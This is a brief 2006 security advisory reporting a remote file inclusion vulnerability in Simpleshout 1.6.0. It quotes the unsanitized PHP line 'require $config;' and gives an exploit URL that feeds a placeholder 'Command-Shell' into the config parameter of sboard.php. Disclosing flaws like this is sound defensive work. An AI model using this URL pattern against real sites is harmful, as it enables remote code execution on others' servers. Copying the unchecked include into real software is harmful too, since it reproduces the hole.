Simpleshout 1.6.0 Version - Remote File Include Vulnerability

2006-06-15T00:00:00
ID SECURITYVULNS:DOC:13181
Type securityvulns
Reporter Securityvulns
Modified 2006-06-15T00:00:00

Description

SaVSaK.CoM | SpC-x - The_BeKiR |

Simpleshout 1.6.0 Version - Remote File Include Vulnerability

Risk : High

Class: Remote

Script : Simpleshout

Credits : SpC-x

Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

Code :

// Require files

require $config;

Vulnerable :

http://www.victim.com/Simpleshout/sboard.php?config=Command-Shell